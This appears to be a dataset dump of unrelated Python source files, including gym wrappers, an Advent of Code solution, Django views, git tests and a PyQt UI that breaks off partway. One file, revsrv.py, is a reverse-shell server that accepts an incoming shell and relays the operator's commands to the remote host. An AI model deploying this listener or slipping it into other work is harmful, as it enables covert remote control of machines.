"Natural Language :: English",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Libraries :: Python Modules",
],
packages=['funniest_ieee'],
install_requires=[
'nose',
'pylint',
'coverage',
'nosexcover',
'flake8',
'twine'
],
test_suite='nose.collector',
tests_require=['nose']
)
| 1.226563 | 1 |
Python/sum.py | AbdalrohmanGitHub/Logik | 13 | 12797995 | <gh_stars>10-100
# This program reads a number n and computes the sum 1 + 2 + ... + n.
n = input('Type a natural number and press return: ')
n = int(n)
s = { i for i in range(1, n+1) }
s = sum(s)
print('The sum 1 + 2 + ... + ', n, ' is equal to ', s, '.', sep= '')
| 3.875 | 4 |
enrollment/views/__init__.py | Siikakala/kompassi | 0 | 12797996 | <reponame>Siikakala/kompassi
# encoding: utf-8
from .enrollment_event_box_context import enrollment_event_box_context
from .enrollment_enroll_view import enrollment_enroll_view
from .enrollment_admin_view import enrollment_admin_view
from .enrollment_admin_special_diets_view import enrollment_admin_special_diets_view
from .enrollment_admin_menu_items import enrollment_admin_menu_items
| 0.847656 | 1 |
environments/metaworld/reach_ml1.py | bryanoliveira/varibad | 0 | 12797997 | import numpy as np
import gym
from random import randint
from metaworld.benchmarks import ML1
class ReachML1Env(gym.Env):
def __init__(self, max_episode_steps=150,out_of_distribution=False, n_train_tasks=50, n_test_tasks=10, **kwargs):
super(ReachML1Env, self).__init__()
self.train_env = ML1.get_train_tasks('reach-v1', out_of_distribution=out_of_distribution)
self.test_env = ML1.get_test_tasks('reach-v1', out_of_distribution=out_of_distribution)
self.train_tasks = self.train_env.sample_tasks(n_train_tasks)
self.test_tasks = self.test_env.sample_tasks(n_test_tasks)
self.tasks = self.train_tasks + self.test_tasks
self.env = self.train_env #this env will change depending on the idx
self.observation_space = self.env.observation_space
self.action_space = self.env.action_space
self.goal_space_origin = np.array([0, 0.85, 0.175])
self.current_task_idx = 0
self.episode_steps = 0
self._max_episode_steps = max_episode_steps
# self.get_tasks_goals()
# self.reset_task()
def step(self, action):
self.episode_steps += 1
obs, reward, done, info = self.env.step(action)
if self.episode_steps >= self._max_episode_steps:
done = True
return obs, reward, done, info
def reset(self):
self.episode_steps = 0
return self.env.reset()
def seed(self, seed):
self.train_env.seed(seed)
self.test_env.seed(seed)
def get_all_task_idx(self):
return range(len(self.tasks))
def set_task(self, idx):
self.current_task_idx = idx
self.env = self.train_env if idx < len(self.train_tasks) else self.test_env
self.env.set_task(self.tasks[idx])
self._goal = self.tasks[idx]['goal']
def get_task(self):
return self.tasks[self.current_task_idx]['goal'] # goal_pos
def reset_task(self, task=None, test=False):
# aparently this is called only without idx, so tasks are always scrambled
# we have to set anything only at test time
if task is None:
if test:
task = randint(len(self.train_tasks), len(self.tasks) - 1)
else:
task = randint(0, len(self.train_tasks) - 1)
self.set_task(task)
def render(self):
self.env.render()
def get_tasks_goals(self):
for idx in range(len(self.tasks)):
self.reset_task(idx)
_, _, _, info = self.step(self.action_space.sample())
self.tasks[idx]['goal_pos'] = info['goal']
| 2.46875 | 2 |
day20.py | hubbardgary/AdventOfCode | 0 | 12797998 | # --- Day 20: Infinite Elves and Infinite Houses ---
#
# To keep the Elves busy, Santa has them deliver some presents by hand, door-to-door. He sends them down a street with
# infinite houses numbered sequentially: 1, 2, 3, 4, 5, and so on.
#
# Each Elf is assigned a number, too, and delivers presents to houses based on that number:
#
# The first Elf (number 1) delivers presents to every house: 1, 2, 3, 4, 5, ....
# The second Elf (number 2) delivers presents to every second house: 2, 4, 6, 8, 10, ....
# Elf number 3 delivers presents to every third house: 3, 6, 9, 12, 15, ....
#
# There are infinitely many Elves, numbered starting with 1. Each Elf delivers presents equal to ten times his or her
# number at each house.
#
# So, the first nine houses on the street end up like this:
#
# House 1 got 10 presents.
# House 2 got 30 presents.
# House 3 got 40 presents.
# House 4 got 70 presents.
# House 5 got 60 presents.
# House 6 got 120 presents.
# House 7 got 80 presents.
# House 8 got 150 presents.
# House 9 got 130 presents.
#
# The first house gets 10 presents: it is visited only by Elf 1, which delivers 1 * 10 = 10 presents. The fourth house
# gets 70 presents, because it is visited by Elves 1, 2, and 4, for a total of 10 + 20 + 40 = 70 presents.
#
# What is the lowest house number of the house to get at least as many presents as the number in your puzzle input?
#
# --- Part Two ---
#
# The Elves decide they don't want to visit an infinite number of houses. Instead, each Elf will stop after delivering
# presents to 50 houses. To make up for it, they decide to deliver presents equal to eleven times their number at each
# house.
#
# With these changes, what is the new lowest house number of the house to get at least as many presents as the number
# in your puzzle input?
from math import sqrt
def get_part1_factors(n):
factors = set()
for x in range(1, int(sqrt(n)) + 1):
if n % x == 0:
factors.add(x)
factors.add(n // x)
return factors
def get_part2_factors(n):
factors = set()
for x in range(1, int(sqrt(n)) + 1):
if n % x == 0:
if x * 50 >= n:
factors.add(x)
if (n // x) * 50 >= n:
factors.add(n // x)
return factors
data = 33100000
# Part 1
house_no = 1
while True:
presents = sum(map(lambda i: i*10, get_part1_factors(house_no)))
if presents >= data:
print("House no: {0}".format(house_no))
break
house_no += 1
# Part 2
house_no = 1
while True:
presents = sum(map(lambda i: i*11, get_part2_factors(house_no)))
if presents >= data:
print("House no: {0}".format(house_no))
break
house_no += 1
| 3.875 | 4 |
default.py | aerth/plugin.audio.partymoder | 0 | 12797999 | # partymoder xbmc add-on
# Copyright 2017 aerth <<EMAIL>>
# Released under the terms of the MIT License
import xbmc
xbmc.executebuiltin('xbmc.PlayerControl(Partymode(music)', True)
xbmc.executebuiltin('xbmc.PlayerControl(repeatall)', True)
xbmc.executebuiltin("Action(Fullscreen)", True)
| 1.734375 | 2 |
src/third_party/angle/third_party/glmark2/src/waflib/Tools/dmd.py | goochen/naiveproxy | 2,151 | 12798000 | <reponame>goochen/naiveproxy
#! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! https://waf.io/book/index.html#_obtaining_the_waf_file
import sys
from waflib.Tools import ar,d
from waflib.Configure import conf
@conf
def find_dmd(conf):
conf.find_program(['dmd','dmd2','ldc'],var='D')
out=conf.cmd_and_log(conf.env.D+['--help'])
if out.find("D Compiler v")==-1:
out=conf.cmd_and_log(conf.env.D+['-version'])
if out.find("based on DMD v1.")==-1:
conf.fatal("detected compiler is not dmd/ldc")
@conf
def common_flags_ldc(conf):
v=conf.env
v.DFLAGS=['-d-version=Posix']
v.LINKFLAGS=[]
v.DFLAGS_dshlib=['-relocation-model=pic']
@conf
def common_flags_dmd(conf):
v=conf.env
v.D_SRC_F=['-c']
v.D_TGT_F='-of%s'
v.D_LINKER=v.D
v.DLNK_SRC_F=''
v.DLNK_TGT_F='-of%s'
v.DINC_ST='-I%s'
v.DSHLIB_MARKER=v.DSTLIB_MARKER=''
v.DSTLIB_ST=v.DSHLIB_ST='-L-l%s'
v.DSTLIBPATH_ST=v.DLIBPATH_ST='-L-L%s'
v.LINKFLAGS_dprogram=['-quiet']
v.DFLAGS_dshlib=['-fPIC']
v.LINKFLAGS_dshlib=['-L-shared']
v.DHEADER_ext='.di'
v.DFLAGS_d_with_header=['-H','-Hf']
v.D_HDR_F='%s'
def configure(conf):
conf.find_dmd()
if sys.platform=='win32':
out=conf.cmd_and_log(conf.env.D+['--help'])
if out.find('D Compiler v2.')>-1:
conf.fatal('dmd2 on Windows is not supported, use gdc or ldc2 instead')
conf.load('ar')
conf.load('d')
conf.common_flags_dmd()
conf.d_platform_flags()
if str(conf.env.D).find('ldc')>-1:
conf.common_flags_ldc()
| 1.757813 | 2 |
blog/admin.py | sandipsandal/Just-A-Thought | 0 | 12798001 | from django.contrib import admin
from blog.models import Post, BlogComment, Category
# Register your models here.
admin.site.register((BlogComment,)) # it must be in tupple formate
admin.site.register(Category)
@admin.register(Post)
class PostAdmin(admin.ModelAdmin):
class Media:
js = ("tinyInject.js",)
| 1.765625 | 2 |
backend/appengine/routes/subjects/edit.py | MarcosVn/turinginformatica | 0 | 12798002 | <filename>backend/appengine/routes/subjects/edit.py
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from google.appengine.ext import ndb
from course.course_model import Subject, Course
from config.template_middleware import TemplateResponse
from gaecookie.decorator import no_csrf
from gaepermission.decorator import login_not_required
from routes import subjects
from tekton.gae.middleware.redirect import RedirectResponse
from tekton.router import to_path
__author__ = 'marcos'
@no_csrf
@login_not_required
def index(subject_id):
subject = Subject.get_by_id(int(subject_id))
ctx={'subject': subject,
'salvar_path': to_path(atualizar)
}
ctx["courses"] = Course.query_ordenada_por_nome().fetch()
return TemplateResponse(ctx, 'subjects/subject_form.html')
@login_not_required
def atualizar(subject_id, name, activities, course):
subject = Subject.get_by_id(int(subject_id))
subject.name = name
subject.activities = activities
subject.course = ndb.Key(Course, int(course))
subject.put()
return RedirectResponse(subjects) | 2.234375 | 2 |
code/Algorithms/RandomChoice.py | BogyMitutoyoCTL/Snake-AI-2021.1 | 0 | 12798003 | <filename>code/Algorithms/RandomChoice.py
from random import random
from Algorithms.Algorithms import Algorithm
from GameData import GameData
class RandomChoice(Algorithm):
def __init__(self):
super().__init__()
"""
A stupid algorithm that returns a random value.
This can be used for comparisons with other algorithms.
Best result: length 4 on a 10x20 field in 1000 epochs
"""
def decide(self, info: GameData) -> str:
r = int(random() * 3)
if r == 0:
return "turn left"
elif r == 1:
return "turn right"
else:
return "straight"
| 3.71875 | 4 |
network/revsh/revsrv.py | dogoncouch/dogoncouch-misc | 3 | 12798004 | #!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2018 <NAME> (<EMAIL>)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from argparse import ArgumentParser
import socket
from sys import exit, stdout
from time import sleep
__version__ = '0.1'
class RSSrvCore:
def __init__(self):
"""Initialize a shell server"""
self.args = None
self.arg_parser = ArgumentParser()
def get_args(self):
"""Set argument options"""
self.arg_parser.add_argument('--version', action = 'version',
version = '%(prog)s ' + str(__version__))
self.arg_parser.add_argument('-f',
action = 'store_true', dest = 'force',
help = ('bind to sockets that are already in use'))
self.arg_parser.add_argument('port',
action = 'store', type=int,
help = ('set the local port'))
self.args = self.arg_parser.parse_args()
def main_event(self, force=False):
"""Connect to an incoming shell"""
s = socket.socket()
if force:
print('Enabling socket address reuse.')
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print('Binding to port ' + str(self.args.port))
s.bind(('0.0.0.0', self.args.port))
s.listen(1)
conn, host = s.accept()
print('Received connection from ' + str(host[0]) + \
':' + str(host[1]) + '.')
remotehost, remotepyversion = str(
conn.recv(1024))[2:-1].split(':')
print('Remote hostname: ' + remotehost + '.\n' + \
'Remote Python major version: ' + remotepyversion + \
'.\nEnter h for help.')
remotepyversion = int(remotepyversion)
if remotehost.split('@')[0] == 'root':
promptsuffix = ' # '
else:
promptsuffix = ' $ '
print('Type exit or enter EOF (ctrl-d) to exit.')
while True:
try:
cmd = input(remotehost + promptsuffix)
if cmd == '!':
cmd = lastcmd
elif cmd == '':
cmd = '\n'
if cmd == 'exit':
conn.send(bytes(cmd, 'utf8'))
conn.close()
s.close()
exit(0)
elif cmd == 'drop':
conn.send(bytes('exit', 'utf8'))
conn.close()
s.close()
return 0
elif cmd == 'detach':
conn.send(bytes(cmd, 'utf8'))
conn.close()
s.close()
exit(0)
elif cmd == 'h':
self.show_help()
else:
conn.send(bytes(cmd, 'utf8'))
recdata = conn.recv(16834)
if remotepyversion == 2:
if recdata and recdata != ':':
stdout.buffer.write(recdata)
else:
if recdata and recdata != bytes('\n', 'utf8'):
stdout.buffer.write(recdata)
lastcmd = cmd
except EOFError:
conn.send(bytes('exit', 'utf8'))
print('exit')
conn.close()
s.close()
exit(0)
def show_help(self):
"""Show help for shell options"""
h = []
h.append('\nCommand Description')
h.append('-----------------------------')
h.append('h show this help menu')
h.append('exit close program (local and remote)')
h.append('drop close shell, keep server running')
h.append('detach close shell, keep client running')
h.append('cd DIR change directory')
h.append('')
print('\n'.join(h))
def run_script(self):
"""Run the shell server program"""
try:
self.get_args()
self.main_event(force=self.args.force)
while True:
self.main_event(force=True)
except KeyboardInterrupt:
print('\nExiting on KeyboardInterrupt')
def main():
thing = RSSrvCore()
thing.run_script()
if __name__ == "__main__":
main()
| 1.953125 | 2 |
testing/test_GitWrapper_committing.py | jkpubsrc/python-module-jk-git | 0 | 12798005 | <filename>testing/test_GitWrapper_committing.py
#!/usr/bin/python3
import os
import typing
import tempfile
import jk_json
import jk_logging
import jk_typing
import jk_git
from TestHelper import TestHelper
with jk_logging.wrapMain() as log:
with TestHelper(log) as th:
th.createRepository(log)
th.createSingleFileAndCommitIt("foo1.txt", "mycommitmsg1", log)
th.createSingleFileAndCommitIt("foo2.txt", "mycommitmsg2", log)
"""
with log.descend("Creating another file and committing it ...") as log2:
filePath = os.path.join(tempDirPath, "foo2.txt")
with open(filePath, "w") as fout:
fout.write("")
ret = git.add(tempDirPath, filePath, log=log2)
_dumpOutput(ret, log2)
ret = git.commit(tempDirPath, "mycommitmsg2", log=log2)
_dumpOutput(ret, log2)
"""
with log.descend("Creating a branch ...") as log2:
ret = th.git.createBranch(th.tempDirPath, "mybranch", log=log2)
th._dumpOutput(ret, log2)
with log.descend("Listing branches ...") as log2:
ret = th.git.listBranches(th.tempDirPath, log=log2)
th._dumpOutput(ret, log2)
assert isinstance(ret, list)
assert len(ret) == 2
assert ret[0] == " master"
assert ret[1] == "* mybranch"
"""
with log.descend("Creating even another file and committing it ...") as log2:
filePath = os.path.join(th.tempDirPath, "foo3.txt")
with open(filePath, "w") as fout:
fout.write("")
ret = th.git.add(th.tempDirPath, filePath, log=log2)
th._dumpOutput(ret, log2)
ret = th.git.commit(th.tempDirPath, "mycommitmsg3", log=log2)
th._dumpOutput(ret, log2)
"""
th.createSingleFileAndCommitIt("foo3.txt", "mycommitmsg3", log)
with log.descend("Show log ...") as log2:
ret = th.git.showLog(th.tempDirPath, log=log2)
th._dumpOutput(ret, log2)
#
| 2.609375 | 3 |
src/urh/ui/ui_analysis_frame.py | awesome-archive/urh | 1 | 12798006 | <filename>src/urh/ui/ui_analysis_frame.py
# -*- coding: utf-8 -*-
#
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_FAnalysis(object):
def setupUi(self, FAnalysis):
FAnalysis.setObjectName("FAnalysis")
FAnalysis.resize(1372, 907)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(FAnalysis.sizePolicy().hasHeightForWidth())
FAnalysis.setSizePolicy(sizePolicy)
FAnalysis.setFocusPolicy(QtCore.Qt.ClickFocus)
FAnalysis.setAcceptDrops(True)
FAnalysis.setFrameShape(QtWidgets.QFrame.StyledPanel)
FAnalysis.setFrameShadow(QtWidgets.QFrame.Raised)
FAnalysis.setLineWidth(1)
FAnalysis.setMidLineWidth(0)
self.verticalLayout_2 = QtWidgets.QVBoxLayout(FAnalysis)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.splitter = QtWidgets.QSplitter(FAnalysis)
self.splitter.setOrientation(QtCore.Qt.Vertical)
self.splitter.setObjectName("splitter")
self.frame_2 = QtWidgets.QFrame(self.splitter)
self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_2.setObjectName("frame_2")
self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.frame_2)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.splitter_2 = QtWidgets.QSplitter(self.frame_2)
self.splitter_2.setOrientation(QtCore.Qt.Horizontal)
self.splitter_2.setObjectName("splitter_2")
self.frame_4 = QtWidgets.QFrame(self.splitter_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.frame_4.sizePolicy().hasHeightForWidth())
self.frame_4.setSizePolicy(sizePolicy)
self.frame_4.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_4.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_4.setObjectName("frame_4")
self.verticalLayout_8 = QtWidgets.QVBoxLayout(self.frame_4)
self.verticalLayout_8.setObjectName("verticalLayout_8")
self.scrollArea = QtWidgets.QScrollArea(self.frame_4)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents = QtWidgets.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 320, 514))
self.scrollAreaWidgetContents.setObjectName("scrollAreaWidgetContents")
self.verticalLayout = QtWidgets.QVBoxLayout(self.scrollAreaWidgetContents)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.label_5 = QtWidgets.QLabel(self.scrollAreaWidgetContents)
self.label_5.setObjectName("label_5")
self.horizontalLayout_2.addWidget(self.label_5)
self.btnSaveProto = QtWidgets.QToolButton(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnSaveProto.sizePolicy().hasHeightForWidth())
self.btnSaveProto.setSizePolicy(sizePolicy)
self.btnSaveProto.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.btnSaveProto.setBaseSize(QtCore.QSize(0, 0))
icon = QtGui.QIcon.fromTheme("document-save")
self.btnSaveProto.setIcon(icon)
self.btnSaveProto.setToolButtonStyle(QtCore.Qt.ToolButtonIconOnly)
self.btnSaveProto.setObjectName("btnSaveProto")
self.horizontalLayout_2.addWidget(self.btnSaveProto)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.treeViewProtocols = ProtocolTreeView(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.treeViewProtocols.sizePolicy().hasHeightForWidth())
self.treeViewProtocols.setSizePolicy(sizePolicy)
self.treeViewProtocols.setAcceptDrops(True)
self.treeViewProtocols.setDragEnabled(True)
self.treeViewProtocols.setDragDropOverwriteMode(False)
self.treeViewProtocols.setDragDropMode(QtWidgets.QAbstractItemView.DragDrop)
self.treeViewProtocols.setDefaultDropAction(QtCore.Qt.IgnoreAction)
self.treeViewProtocols.setObjectName("treeViewProtocols")
self.treeViewProtocols.header().setVisible(False)
self.verticalLayout.addWidget(self.treeViewProtocols)
self.label_4 = QtWidgets.QLabel(self.scrollAreaWidgetContents)
self.label_4.setObjectName("label_4")
self.verticalLayout.addWidget(self.label_4)
self.listViewParticipants = QtWidgets.QListView(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.listViewParticipants.sizePolicy().hasHeightForWidth())
self.listViewParticipants.setSizePolicy(sizePolicy)
self.listViewParticipants.setObjectName("listViewParticipants")
self.verticalLayout.addWidget(self.listViewParticipants)
self.cbProtoView = QtWidgets.QComboBox(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.cbProtoView.sizePolicy().hasHeightForWidth())
self.cbProtoView.setSizePolicy(sizePolicy)
self.cbProtoView.setObjectName("cbProtoView")
self.cbProtoView.addItem("")
self.cbProtoView.addItem("")
self.cbProtoView.addItem("")
self.verticalLayout.addWidget(self.cbProtoView)
self.cbDecoding = QtWidgets.QComboBox(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.cbDecoding.sizePolicy().hasHeightForWidth())
self.cbDecoding.setSizePolicy(sizePolicy)
self.cbDecoding.setSizeAdjustPolicy(QtWidgets.QComboBox.AdjustToContents)
self.cbDecoding.setObjectName("cbDecoding")
self.cbDecoding.addItem("")
self.cbDecoding.addItem("")
self.cbDecoding.addItem("")
self.cbDecoding.addItem("")
self.cbDecoding.addItem("")
self.verticalLayout.addWidget(self.cbDecoding)
self.lEncodingErrors = QtWidgets.QLabel(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lEncodingErrors.sizePolicy().hasHeightForWidth())
self.lEncodingErrors.setSizePolicy(sizePolicy)
self.lEncodingErrors.setObjectName("lEncodingErrors")
self.verticalLayout.addWidget(self.lEncodingErrors)
self.lDecodingErrorsValue = QtWidgets.QLabel(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lDecodingErrorsValue.sizePolicy().hasHeightForWidth())
self.lDecodingErrorsValue.setSizePolicy(sizePolicy)
self.lDecodingErrorsValue.setObjectName("lDecodingErrorsValue")
self.verticalLayout.addWidget(self.lDecodingErrorsValue)
self.labelDecodingState = QtWidgets.QLabel(self.scrollAreaWidgetContents)
self.labelDecodingState.setObjectName("labelDecodingState")
self.verticalLayout.addWidget(self.labelDecodingState)
self.cbShowDiffs = QtWidgets.QCheckBox(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.cbShowDiffs.sizePolicy().hasHeightForWidth())
self.cbShowDiffs.setSizePolicy(sizePolicy)
self.cbShowDiffs.setObjectName("cbShowDiffs")
self.verticalLayout.addWidget(self.cbShowDiffs)
self.chkBoxShowOnlyDiffs = QtWidgets.QCheckBox(self.scrollAreaWidgetContents)
self.chkBoxShowOnlyDiffs.setObjectName("chkBoxShowOnlyDiffs")
self.verticalLayout.addWidget(self.chkBoxShowOnlyDiffs)
self.chkBoxOnlyShowLabelsInProtocol = QtWidgets.QCheckBox(self.scrollAreaWidgetContents)
self.chkBoxOnlyShowLabelsInProtocol.setObjectName("chkBoxOnlyShowLabelsInProtocol")
self.verticalLayout.addWidget(self.chkBoxOnlyShowLabelsInProtocol)
self.btnAnalyze = QtWidgets.QToolButton(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnAnalyze.sizePolicy().hasHeightForWidth())
self.btnAnalyze.setSizePolicy(sizePolicy)
self.btnAnalyze.setPopupMode(QtWidgets.QToolButton.MenuButtonPopup)
self.btnAnalyze.setToolButtonStyle(QtCore.Qt.ToolButtonTextOnly)
self.btnAnalyze.setObjectName("btnAnalyze")
self.verticalLayout.addWidget(self.btnAnalyze)
self.stackedWidgetLogicAnalysis = QtWidgets.QStackedWidget(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.stackedWidgetLogicAnalysis.sizePolicy().hasHeightForWidth())
self.stackedWidgetLogicAnalysis.setSizePolicy(sizePolicy)
self.stackedWidgetLogicAnalysis.setObjectName("stackedWidgetLogicAnalysis")
self.pageButtonAnalyzer = QtWidgets.QWidget()
self.pageButtonAnalyzer.setObjectName("pageButtonAnalyzer")
self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.pageButtonAnalyzer)
self.verticalLayout_5.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.stackedWidgetLogicAnalysis.addWidget(self.pageButtonAnalyzer)
self.pageProgressBar = QtWidgets.QWidget()
self.pageProgressBar.setObjectName("pageProgressBar")
self.verticalLayout_6 = QtWidgets.QVBoxLayout(self.pageProgressBar)
self.verticalLayout_6.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_6.setObjectName("verticalLayout_6")
self.progressBarLogicAnalyzer = QtWidgets.QProgressBar(self.pageProgressBar)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.progressBarLogicAnalyzer.sizePolicy().hasHeightForWidth())
self.progressBarLogicAnalyzer.setSizePolicy(sizePolicy)
self.progressBarLogicAnalyzer.setProperty("value", 24)
self.progressBarLogicAnalyzer.setObjectName("progressBarLogicAnalyzer")
self.verticalLayout_6.addWidget(self.progressBarLogicAnalyzer)
self.stackedWidgetLogicAnalysis.addWidget(self.pageProgressBar)
self.verticalLayout.addWidget(self.stackedWidgetLogicAnalysis)
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.verticalLayout_8.addWidget(self.scrollArea)
self.frame_3 = QtWidgets.QFrame(self.splitter_2)
self.frame_3.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_3.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_3.setObjectName("frame_3")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.frame_3)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.gridLayout_2 = QtWidgets.QGridLayout()
self.gridLayout_2.setObjectName("gridLayout_2")
self.lineEditSearch = QtWidgets.QLineEdit(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lineEditSearch.sizePolicy().hasHeightForWidth())
self.lineEditSearch.setSizePolicy(sizePolicy)
self.lineEditSearch.setAcceptDrops(False)
self.lineEditSearch.setClearButtonEnabled(True)
self.lineEditSearch.setObjectName("lineEditSearch")
self.gridLayout_2.addWidget(self.lineEditSearch, 0, 0, 1, 1)
self.btnSearchSelectFilter = QtWidgets.QToolButton(self.frame_3)
self.btnSearchSelectFilter.setPopupMode(QtWidgets.QToolButton.MenuButtonPopup)
self.btnSearchSelectFilter.setToolButtonStyle(QtCore.Qt.ToolButtonTextOnly)
self.btnSearchSelectFilter.setObjectName("btnSearchSelectFilter")
self.gridLayout_2.addWidget(self.btnSearchSelectFilter, 0, 1, 1, 1)
self.lFilterShown = QtWidgets.QLabel(self.frame_3)
self.lFilterShown.setObjectName("lFilterShown")
self.gridLayout_2.addWidget(self.lFilterShown, 0, 2, 1, 1)
self.btnPrevSearch = QtWidgets.QToolButton(self.frame_3)
self.btnPrevSearch.setEnabled(False)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnPrevSearch.sizePolicy().hasHeightForWidth())
self.btnPrevSearch.setSizePolicy(sizePolicy)
self.btnPrevSearch.setMaximumSize(QtCore.QSize(20, 16777215))
icon = QtGui.QIcon.fromTheme("go-previous")
self.btnPrevSearch.setIcon(icon)
self.btnPrevSearch.setObjectName("btnPrevSearch")
self.gridLayout_2.addWidget(self.btnPrevSearch, 0, 3, 1, 1)
